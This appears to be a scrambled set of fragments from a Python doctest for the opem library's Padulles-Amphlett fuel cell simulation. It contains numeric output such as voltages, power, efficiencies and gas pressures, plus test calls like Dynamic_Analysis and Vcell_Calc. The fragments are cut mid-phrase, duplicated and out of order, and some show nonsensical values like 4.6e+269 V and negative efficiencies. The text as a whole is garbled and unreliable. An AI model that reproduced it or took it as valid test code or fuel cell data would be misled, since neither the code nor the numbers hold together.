V Loss : 4.63717533307516e+269 V PH2 : 0.19717074233280188 atm PH2O :", "0.4142554269432475 V PH2 : 0.196777331647599 atm PH2O : 0.24219894069349326 atm PO2 : 0.1904042491687454", ": 3.4 E : 6.06836472559345 V Eta Activation : 0.4190844003836543 V Eta Concentration", "0.19700213775342923 atm PH2O : 0.24247563821874998 atm PO2 : 0.19053117457991825 atm Power-Thermal : 2.432697510654893", "V Eta Ohmic : 0.005672855976278701 V FC Efficiency : 0.507882865258588 FC Power :", "Ohmic : 4.63717533307516e+269 V FC Efficiency : -2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W", ": 6.068381657907269 V Eta Activation : 0.39318591119501267 V Eta Concentration : 0.00045476978327314626 V", ": 3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837 V FC Efficiency : 0.6293798842665886 FC", "0.5755840434599239 FC Power : 3.1426888772911847 W FC Voltage : 4.489555538987407 V Loss :", "########### I : 1.0 E : 6.068401658824337 V Eta Activation : 0.33802037026202836 V", "FC Efficiency : 0.5341016324451575 FC Power : 7.498786919530012 W FC Voltage : 4.165992733072229", ": 0.0015834606415773538 V FC Efficiency : 0.5646650099463304 FC Power : 3.96394836982324 W FC", ": 0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026 V FC Efficiency : 0.5393558719759229 FC", "PH2O : 0.24218164709816473 atm PO2 : 0.19039631633054707 atm Power-Thermal : 6.49540141236458 W ###########", "W FC Voltage : 4.185910978067744 V Loss : 0.3764959824754877 V PH2 : 0.19694593622697168", ": 0.5755840434599239 FC Power : 3.1426888772911847 W FC Voltage : 4.489555538987407 V Loss", "FC Power : 5.1674201677537885 W FC Voltage : 4.306183473128157 V Loss : 0.3524430218673324", "PO2 : 0.1904439133597369 atm Power-Thermal : 5.004572056867657 W ########### I : 2.5 E", ": -3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V PH2", "0.1905867044473064 atm Power-Thermal : 0.9650580567185031 W ########### I : 0.7 E : 6.068406272883388", "0.006210893371826288 V 
FC Efficiency : 0.5036913732928463 FC Power : 13.750774490894704 W FC Voltage", "0.24816738054412169 W ########### I : 0.3 E : 6.068412424065923 V Eta Activation :", "W FC Voltage : 5.1395791003235525 V Loss : 0.18576727978992955 V PH2 : 0.19717074233280188", "0.3328032238653337 V PH2 : 0.19705833927988675 atm PH2O : 0.24254481260006414 atm PO2 : 0.19056290593271147", ": 0.00442164533169592 V FC Efficiency : 0.5192622556245563 FC Power : 10.12561398467885 W FC", "Power-Thermal : 6.748686546268298 W ########### I : 3.2 E : 6.068367804773196 V Eta", "0.19032492078676233 atm Power-Thermal : 8.818208962422144 W ########### Report is generating ... Done! >>>", "V Loss : 0.387853540075361 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm", "0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461 V FC Efficiency : 0.569790429225178 FC Power", "0.3399763535283976 V PH2 : 0.19704428889827239 atm PH2O : 0.2425275190047356 atm PO2 : 0.1905549730945132", "15.166791037577857 W FC Voltage : 3.888920778866117 V Loss : 0.4358872495310143 V PH2 :", "Eta Ohmic : 0.0029988129062160497 V FC Efficiency : 0.5366552535984287 FC Power : 7.116048662715165", "Concentration : 0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026 V FC Efficiency : 0.5393558719759229", "FC Efficiency : 0.5422224856637728 FC Power : 6.344003082266143 W FC Voltage : 4.229335388177429", ": 0.4038089891176398 V Eta Concentration : 0.0005353086845364485 V Eta Ohmic : 0.004778536276705824 V", "0.5646650099463304 FC Power : 3.96394836982324 W FC Voltage : 4.404387077581378 V Loss :", "Loss : 0.3579405643231677 V PH2 : 0.19700213775342923 atm PH2O : 0.24247563821874998 atm PO2", ": 0.19052324174171997 atm Power-Thermal : 2.6555639230341663 W ########### I : 1.5 E :", "PO2 : 0.19052324174171997 atm Power-Thermal : 2.6555639230341663 W ########### I : 1.5 E", "V Eta Concentration : 0.0007385973342150736 V Eta Ohmic : 0.00657019196303564 V FC Efficiency", "PH2O : 0.24226811507480747 atm PO2 : 
0.19043598052153862 atm Power-Thermal : 5.249386015321152 W ###########", "0.19681948279244216 atm PH2O : 0.2422508214794789 atm PO2 : 0.1904280476833403 atm Power-Thermal : 5.495727044129421", "V Eta Activation : 0.35009414904739194 V Eta Concentration : 0.00023552453535116493 V Eta Ohmic", "FC Voltage : 4.677757241603485 V Loss : 0.27813072895256186 V PH2 : 0.19712859118795872 atm", ": 0.00017548304819292376 V FC Efficiency : 0.6589203974773784 FC Power : 0.5139579100323552 W FC", "V FC Efficiency : 0.5755840434599239 FC Power : 3.1426888772911847 W FC Voltage :", "Concentration : 0.00047486339861378836 V Eta Ohmic : 0.004243378155424144 V FC Efficiency : 0.5211232875604884", "V Eta Concentration : 1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269 V FC Efficiency", "V Eta Concentration : 0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617 V FC Efficiency", "0.19710049042472996 atm PH2O : 0.2425966933860498 atm PO2 : 0.1905867044473064 atm Power-Thermal : 0.9650580567185031", ": 11.591576336201861 W FC Voltage : 3.997095288345469 V Loss : 0.4142554269432475 V PH2", "0.0003547094700620668 V Eta Ohmic : 0.003176255519565377 V FC Efficiency : 0.5341016324451575 FC Power", "0.24263128057670688 atm PO2 : 0.19060257012370302 atm Power-Thermal : 0.588897103358606 W ########### I :", "PH2O : 0.2425275190047356 atm PO2 : 0.1905549730945132 atm Power-Thermal : 1.781480108817652 W ###########", "W ########### I : 3.0 E : 6.0683708836963435 V Eta Activation : 0.4107901672807063", ": 0.5271753860695316 FC Power : 8.635132823818928 W FC Voltage : 4.111968011342347 V Loss", "FC Power : 7.498786919530012 W FC Voltage : 4.165992733072229 V Loss : 0.380479323755368", ": 0.42361505111213504 V PH2 : 0.19672113012114145 atm PH2O : 0.2421297663121791 atm PO2 :", "Loss : 1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm PH2O : 0.24200871114487932 atm PO2", "Power-Thermal : 7.516043371344917 W ########### I : 3.5 E : 6.068363185907339 V Eta", ": 0.1906105029619013 
atm Power-Thermal : 0.41280968341523216 W ########### I : 0.4 E :", "generating ... Warning : The value of I(>0.1) leads to minus amount of", ": 0.5093595307581349 FC Power : 12.316313453731704 W FC Voltage : 3.9730043399134525 V Loss", ">>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error]", "0.24244105102809288 atm PO2 : 0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W ########### I :", ": 0.0006366034731784721 V Eta Ohmic : 0.005672855976278701 V FC Efficiency : 0.507882865258588 FC", "Power : -3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V", "Activation : 0.38052969267197334 V Eta Concentration : 0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046", ": 4.368519891182348 W FC Voltage : 4.368519891182348 V Loss : 0.3399763535283976 V PH2", ": 0.006210893371826288 V FC Efficiency : 0.5036913732928463 FC Power : 13.750774490894704 W FC", ">>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>>", "Eta Concentration : 0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538 V FC Efficiency :", "atm Power-Thermal : 0.24816738054412169 W ########### I : 0.3 E : 6.068412424065923 V", "3.997095288345469 V Loss : 0.4142554269432475 V PH2 : 0.196777331647599 atm PH2O : 0.24219894069349326", "Loss : 0.3764959824754877 V PH2 : 0.19694593622697168 atm PH2O : 0.2424064638374358 atm PO2", "Eta Ohmic : 0.003531492225469087 V FC Efficiency : 0.5293741761651032 FC Power : 8.25823714817561", "0.5211232875604884 FC Power : 9.755427943132343 W FC Voltage : 4.06476164297181 V Loss :", ": 0.3648724409731032 V Eta Concentration : 0.0002949968562774962 V Eta Ohmic : 0.002644278024175193 V", ": 0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W ########### I : 1.0 E 
:", "Eta Ohmic : 0.005672855976278701 V FC Efficiency : 0.507882865258588 FC Power : 12.676756316854359", "atm Power-Thermal : 2.432697510654893 W ########### I : 1.4 E : 6.06839550584913 V", "########### I : 2.2 E : 6.068383196823811 V Eta Activation : 0.39024111055794025 V", "########### Analyzing . . . I : 0.1 E : 6.14455344314445 V Eta", "TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4,", "Ohmic : 0.006390481776561363 V FC Efficiency : 0.5023661507925354 FC Power : 14.106441514254398 W", "3.0 E : 6.0683708836963435 V Eta Activation : 0.4107901672807063 V Eta Concentration :", ": 4.279867176181073 W ########### I : 2.2 E : 6.068383196823811 V Eta Activation", ": 2.724941943281497 W FC Voltage : 4.541569905469162 V Loss : 0.30536758106117423 V PH2", ": 0.003531492225469087 V FC Efficiency : 0.5293741761651032 FC Power : 8.25823714817561 W FC", "Eta Concentration : 0.0007181421727400468 V Eta Ohmic : 0.006390481776561363 V FC Efficiency :", "Eta Activation : 0.4228725100457559 V Eta Concentration : 0.0007181421727400468 V Eta Ohmic :", "6.24342366379814 W ########### I : 3.0 E : 6.0683708836963435 V Eta Activation :", "W ########### I : 0.9 E : 6.068403196908046 V Eta Activation : 0.3310434726426763", "Eta Ohmic : 0.002644278024175193 V FC Efficiency : 0.5422224856637728 FC Power : 6.344003082266143", "FC Voltage : 4.7739677219492265 V Loss : 0.25888894042333943 V PH2 : 0.19714264156957312 atm", "7.116048662715165 W FC Voltage : 4.185910978067744 V Loss : 0.3764959824754877 V PH2 :", "FC Voltage : 4.368519891182348 V Loss : 0.3399763535283976 V PH2 : 0.19704428889827239 atm", ": 0.24214705990750765 atm PO2 : 0.19038045065415046 atm Power-Thermal : 7.003243683145644 W ########### I", "E : 6.068400120676597 V Eta Activation : 0.3443319458183834 V Eta Concentration : 0.00021575349319660598", "Eta Ohmic : 4.63717533307516e+269 V FC Efficiency : 
-2.9725482904327946e+269 FC Power : -2.3185876665375803e+269", "Efficiency : 0.5230579622427114 FC Power : 9.383659842634243 W FC Voltage : 4.079852105493149 V", "0.0024671853140681515 V FC Efficiency : 0.5452780290261753 FC Power : 5.954436076965834 W FC Voltage", "Eta Activation : 0.3960054536369255 V Eta Concentration : 0.00047486339861378836 V Eta Ohmic :", ": 0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275 V FC Efficiency : 0.5093595307581349 FC", "V Eta Activation : 0.3443319458183834 V Eta Concentration : 0.00021575349319660598 V Eta Ohmic", ": 6.0683708836963435 V Eta Activation : 0.4107901672807063 V Eta Concentration : 0.0005960022064159204 V", "0.0005353086845364485 V Eta Ohmic : 0.004778536276705824 V FC Efficiency : 0.5157386322058496 FC Power", "E : 6.144553093215826 V Eta Activation : 0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06", ": 0.4036265972020676 V PH2 : 0.19683353317405658 atm PH2O : 0.24226811507480747 atm PO2 :", ">>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False", "FC Power : 2.30145399353242 W FC Voltage : 4.60290798706484 V Loss : 0.2931002723075654", "atm Power-Thermal : 1.5710516301767605 W ########### I : 1.0 E : 6.068401658824337 V", "atm Power-Thermal : 1.781480108817652 W ########### I : 1.1 E : 6.068400120676597 V", ": 0.5997124668722417 FC Power : 1.8711028966413943 W FC Voltage : 4.677757241603485 V Loss", "6.14455344314445 V Eta Activation : 0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07 V Eta", "7.498786919530012 W FC Voltage : 4.165992733072229 V Loss : 0.380479323755368 V PH2 :", "7.003243683145644 W ########### I : 3.3 E : 6.0683662652154 V Eta Activation :", "0.3912833448667819 V PH2 : 0.19688973470051413 atm PH2O : 0.24233728945612165 atm PO2 : 0.19046771187433184", "PO2 : 
0.19036458497775385 atm Power-Thermal : 7.516043371344917 W ########### I : 3.5 E", "E : 6.068357026521189 V Eta Activation : 0.42817767789163225 V Eta Concentration : 0.0007795927885366656", "0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515 V FC Efficiency : 0.5452780290261753 FC Power", "Power : 3.96394836982324 W FC Voltage : 4.404387077581378 V Loss : 0.3328032238653337 V", ": 14.460983747095012 W FC Voltage : 3.9083739857013544 V Loss : 0.4319972241282524 V PH2", ": 3.8 E : 6.068358566463993 V Eta Activation : 0.4264559863331208 V Eta Concentration", ": 11.227208859041653 W FC Voltage : 4.0097174496577335 V Loss : 0.41173130254104057 V PH2", "I : 0.8 E : 6.068404734927729 V Eta Activation : 0.3232442167420945 V Eta", "Power : 8.25823714817561 W FC Voltage : 4.129118574087805 V Loss : 0.387853540075361 V", ": 0.38715939375662295 V Eta Concentration : 0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735 V", "Power : 1.8711028966413943 W FC Voltage : 4.677757241603485 V Loss : 0.27813072895256186 V", "FC Voltage : 4.909163097279392 V Loss : 0.23185017288443285 V PH2 : 0.1971566919511875 atm", "########### I : 3.0 E : 6.0683708836963435 V Eta Activation : 0.4107901672807063 V", "0.0007385973342150736 V Eta Ohmic : 0.00657019196303564 V FC Efficiency : 0.50107358791043 FC Power", ": 2.3 E : 6.068381657907269 V Eta Activation : 0.39318591119501267 V Eta Concentration", "Eta Ohmic : 0.006210893371826288 V FC Efficiency : 0.5036913732928463 FC Power : 13.750774490894704", "0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W ########### I : 1.6 E : 6.068392428977227", "########### I : 2.3 E : 6.068381657907269 V Eta Activation : 0.39318591119501267 V", "7.259039668139408 W ########### I : 3.4 E : 6.06836472559345 V Eta Activation :", "V Eta Activation : 0.33802037026202836 V Eta Concentration : 0.0001960088652678871 V Eta Ohmic", "0.2423199958607931 atm PO2 : 0.1904597790361335 atm Power-Thermal : 4.519750111503576 W ########### I :", "Eta 
Activation : 0.40621862980268425 V Eta Concentration : 0.000555512176140013 V Eta Ohmic :", ": 0.2420778855261935 atm PO2 : 0.19034871930135727 atm Power-Thermal : 8.033558485745605 W ########### I", "6.068400120676597 V Eta Activation : 0.3443319458183834 V Eta Concentration : 0.00021575349319660598 V Eta", "Power : 6.731161282259518 W FC Voltage : 4.206975801412199 V Loss : 0.37228332551300575 V", ": 0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418 V FC Efficiency : 0.5755840434599239 FC", "14.460983747095012 W FC Voltage : 3.9083739857013544 V Loss : 0.4319972241282524 V PH2 :", "Power-Thermal : 1.1623111227088154 W ########### I : 0.8 E : 6.068404734927729 V Eta", ": 3.96394836982324 W FC Voltage : 4.404387077581378 V Loss : 0.3328032238653337 V PH2", "4.761340157365757 W ########### I : 2.4 E : 6.068380118926627 V Eta Activation :", "FC Power : -2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270 V Loss : 4.63717533307516e+269", "V FC Efficiency : 0.5108802815228812 FC Power : 11.95459858763542 W FC Voltage :", "PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal", ": 0.24223352788415034 atm PO2 : 0.190420114845142 atm Power-Thermal : 5.7435444057448075 W ########### I", "PH2 : 0.1967913820292134 atm PH2O : 0.2422162342888218 atm PO2 : 0.19041218200694368 atm Power-Thermal", ": 4.036258829180992 V Loss : 0.40642364231840483 V PH2 : 0.19681948279244216 atm PH2O :", "2.0 E : 6.144553272737403 V Eta Activation : 0.9103753288368093 V Eta Concentration :", "0.1 E : 6.0684154992732005 V Eta Activation : 0.18557231242539243 V Eta Concentration :", ": 0.19045184619793523 atm Power-Thermal : 4.761340157365757 W ########### I : 2.4 E :", ": 6.068404734927729 V Eta Activation : 0.3232442167420945 V Eta Concentration : 0.00015659857042988755 V", "0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 0.1010420899676448", "Loss : 0.25888894042333943 V PH2 : 
0.19714264156957312 atm PH2O : 0.24264857417203542 atm PO2", "FC Efficiency : 0.5157386322058496 FC Power : 10.861455594255196 W FC Voltage : 4.022761331205627", "PH2 : 0.19665087821306954 atm PH2O : 0.2420432983355364 atm PO2 : 0.19033285362496066 atm Power-Thermal", ": 0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497 V FC Efficiency : 0.5366552535984287 FC", "0.41173130254104057 V PH2 : 0.1967913820292134 atm PH2O : 0.2422162342888218 atm PO2 : 0.19041218200694368", "0.4299811339950573 V PH2 : 0.1966789789762983 atm PH2O : 0.2420778855261935 atm PO2 : 0.19034871930135727", "W ########### I : 3.8 E : 6.068358566463993 V Eta Activation : 0.4264559863331208", "1.8711028966413943 W FC Voltage : 4.677757241603485 V Loss : 0.27813072895256186 V PH2 :", "Efficiency : 0.5646650099463304 FC Power : 3.96394836982324 W FC Voltage : 4.404387077581378 V", "4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271 V FC Efficiency : -1.2042213141380103e+271 FC Power", "Power : 13.035960331860592 W FC Voltage : 3.950291009654725 V Loss : 0.42361505111213504 V", "Power : 7.498786919530012 W FC Voltage : 4.165992733072229 V Loss : 0.380479323755368 V", "########### I : 2.0 E : 6.0683862744646095 V Eta Activation : 0.3839273955127959 V", ": 4.404387077581378 V Loss : 0.3328032238653337 V PH2 : 0.19705833927988675 atm PH2O :", "V FC Efficiency : 0.5230579622427114 FC Power : 9.383659842634243 W FC Voltage :", "Voltage : 4.06476164297181 V Loss : 0.40072369519096346 V PH2 : 0.19684758355567097 atm PH2O", "2.1 E : 6.068384735676256 V Eta Activation : 0.38715939375662295 V Eta Concentration :", ": 0.3310434726426763 V Eta Concentration : 0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538 V", "0.417106024344736 V Eta Concentration : 0.0006569460115677318 V Eta Ohmic : 0.005852080755831333 V FC", "V Eta Activation : 0.31440243547871893 V Eta Concentration : 0.00013693276339445145 V Eta Ohmic", "W ########### I : 0.5 E : 6.068409348602667 V Eta Activation : 
0.2921240370409447", "Voltage : 4.909163097279392 V Loss : 0.23185017288443285 V PH2 : 0.1971566919511875 atm PH2O", "0.3731623911228729 V Eta Concentration : 0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497 V FC", "1.4 E : 6.06839550584913 V Eta Activation : 0.36030304442922906 V Eta Concentration :", "2.8 E : 6.068373962362936 V Eta Activation : 0.40621862980268425 V Eta Concentration :", "Efficiency : 0.5157386322058496 FC Power : 10.861455594255196 W FC Voltage : 4.022761331205627 V", ": 0.50107358791043 FC Power : 14.460983747095012 W FC Voltage : 3.9083739857013544 V Loss", "V PH2 : 0.19698808737181484 atm PH2O : 0.24245834462342142 atm PO2 : 0.19052324174171997 atm", "V Eta Concentration : 0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538 V FC Efficiency", "coding: utf-8 -*- ''' >>> from opem.Dynamic.Padulles_Amphlett import * >>> import shutil >>>", "6.068413961701556 V Eta Activation : 0.23146009851376736 V Eta Concentration : 3.899435456560147e-05 V Eta", ": 0.1905867044473064 atm Power-Thermal : 0.9650580567185031 W ########### I : 0.7 E :", ": 4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271 V FC Efficiency : -1.2042213141380103e+271 FC", "0.0060314264601405215 V FC Efficiency : 0.5050511549266622 FC Power : 13.393956628655083 W FC Voltage", "-*- ''' >>> from opem.Dynamic.Padulles_Amphlett import * >>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>>", "Power-Thermal : 4.761340157365757 W ########### I : 2.4 E : 6.068380118926627 V Eta", "PH2 : 0.196777331647599 atm PH2O : 0.24219894069349326 atm PO2 : 0.1904042491687454 atm Power-Thermal", "V FC Efficiency : 0.5366552535984287 FC Power : 7.116048662715165 W FC Voltage :", "PH2O : 0.24238917024210727 
atm PO2 : 0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W ###########", "Loss : 0.4190730008706778 V PH2 : 0.19674923088437024 atm PH2O : 0.2421643535028362 atm PO2", "Eta Concentration : 0.0006977152837847073 V Eta Ohmic : 0.006210893371826288 V FC Efficiency :", "atm PH2O : 0.24266586776736396 atm PO2 : 0.1906184358000996 atm Power-Thermal : 0.24816738054412169 W", "Eta Concentration : 0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735 V FC Efficiency :", "V Loss : 0.4190730008706778 V PH2 : 0.19674923088437024 atm PH2O : 0.2421643535028362 atm", "Eta Concentration : 0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617 V FC Efficiency :", "V Eta Concentration : 0.0002949968562774962 V Eta Ohmic : 0.002644278024175193 V FC Efficiency", "Power : 14.106441514254398 W FC Voltage : 3.918455976181777 V Loss : 0.4299811339950573 V", "0.24206059193086493 atm PO2 : 0.19034078646315894 atm Power-Thermal : 8.29401625290499 W ########### I :", "V Eta Concentration : 0.0007795927885366656 V Eta Ohmic : 0.006929978850845375 V FC Efficiency", "Power-Thermal : 1.9954235329963377 W ########### I : 1.2 E : 6.068398582464819 V Eta", ">>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing", "0.1970161881350436 atm PH2O : 0.24249293181407852 atm PO2 : 0.19053910741811658 atm Power-Thermal : 2.212579832246212", "3.1 E : 6.068369344266841 V Eta Activation : 0.4129629601316751 V Eta Concentration :", "0.0003510800160998837 V FC Efficiency : 0.6293798842665886 FC Power : 0.9818326194558784 W FC Voltage", "generating ... Done! 
>>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>>", "0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615 V FC Efficiency : 0.5485505413555333 FC Power", "Power-Thermal : 8.033558485745605 W ########### I : 3.7 E : 6.068360106342617 V Eta", "Done! >>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162", "0.19712859118795872 atm PH2O : 0.24263128057670688 atm PO2 : 0.19060257012370302 atm Power-Thermal : 0.588897103358606", ": 3.9 E : 6.068357026521189 V Eta Activation : 0.42817767789163225 V Eta Concentration", "Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"]", "Eta Ohmic : 0.0005267910327125488 V FC Efficiency : 0.6120471438396443 FC Power : 1.4321903165847678", ": 13.750774490894704 W FC Voltage : 3.9287927116842014 V Loss : 0.42791409484462756 V PH2", "Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>>", "Efficiency : 0.5520748042471996 FC Power : 5.1674201677537885 W FC Voltage : 4.306183473128157 V", ": 0.7 E : 6.068406272883388 V Eta Activation : 0.31440243547871893 V Eta Concentration", ": 0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046 V FC Efficiency : 0.5316790944492106 FC", ">>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> 
Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>>", "Power : 10.12561398467885 W FC Voltage : 4.05024559387154 V Loss : 0.4036265972020676 V", ": 0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538 V FC Efficiency : 0.5646650099463304 FC", ": 0.24237187664677873 atm PO2 : 0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W ########### I", "V FC Efficiency : 0.5124481138904448 FC Power : 11.591576336201861 W FC Voltage :", "0.40072369519096346 V PH2 : 0.19684758355567097 atm PH2O : 0.242285408670136 atm PO2 : 0.1904439133597369", "atm PO2 : 0.19049944322712503 atm Power-Thermal : 3.338951337284836 W ########### I : 1.8", ": 8.033558485745605 W ########### I : 3.7 E : 6.068360106342617 V Eta Activation", "Concentration : 1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376 V FC Efficiency : 0.6589203974773784", "Power : 10.861455594255196 W FC Voltage : 4.022761331205627 V Loss : 0.40912283407888206 V", "Power : 2.30145399353242 W FC Voltage : 4.60290798706484 V Loss : 0.2931002723075654 V", "V Eta Ohmic : 0.0007026162388380664 V FC Efficiency : 0.5997124668722417 FC Power :", ": 1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269 V FC Efficiency : -2.9725482904327946e+269 FC", "Eta Concentration : 0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215 V FC Efficiency :", "E : 6.068401658824337 V Eta Activation : 0.33802037026202836 V Eta Concentration : 0.0001960088652678871", "Activation : 0.417106024344736 V Eta Concentration : 0.0006569460115677318 V Eta Ohmic : 0.005852080755831333", "6.068372423061707 V Eta Activation : 0.4085437792118771 V Eta Concentration : 0.0005757433248249061 V Eta", "########### I : 1.2 E : 6.068398582464819 V Eta Activation : 0.35009414904739194 V", "0.2421643535028362 atm PO2 : 0.1903883834923488 atm Power-Thermal : 6.748686546268298 W ########### I :", "E : 6.068367804773196 V Eta 
Activation : 0.41506683170178466 V Eta Concentration : 0.0006366034731784721", "W ########### I : 3.6 E : 6.068361646157063 V Eta Activation : 0.4228725100457559", "0.5393558719759229 FC Power : 6.731161282259518 W FC Voltage : 4.206975801412199 V Loss :", "atm PO2 : 0.19036458497775385 atm Power-Thermal : 7.516043371344917 W ########### I : 3.5", "0.19053117457991825 atm Power-Thermal : 2.432697510654893 W ########### I : 1.4 E : 6.06839550584913", "Power : 5.1674201677537885 W FC Voltage : 4.306183473128157 V Loss : 0.3524430218673324 V", ": 0.4085437792118771 V Eta Concentration : 0.0005757433248249061 V Eta Ohmic : 0.005135904406545483 V", "Ohmic : 1.8785852500552963e+271 V FC Efficiency : -1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W", "Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . . . 
I", ": 2.432697510654893 W ########### I : 1.4 E : 6.06839550584913 V Eta Activation", ": 4.541569905469162 V Loss : 0.30536758106117423 V PH2 : 0.19710049042472996 atm PH2O :", "atm Power-Thermal : 0.9650580567185031 W ########### I : 0.7 E : 6.068406272883388 V", ": -2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270 V Loss : 4.63717533307516e+269 V PH2", "Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={},", "V FC Efficiency : 0.5646650099463304 FC Power : 3.96394836982324 W FC Voltage :", "1.8 E : 6.068389351849069 V Eta Activation : 0.3769483587657406 V Eta Concentration :", ": 8.635132823818928 W FC Voltage : 4.111968011342347 V Loss : 0.3912833448667819 V PH2", ": -9.331810347802308e+271 W FC Voltage : 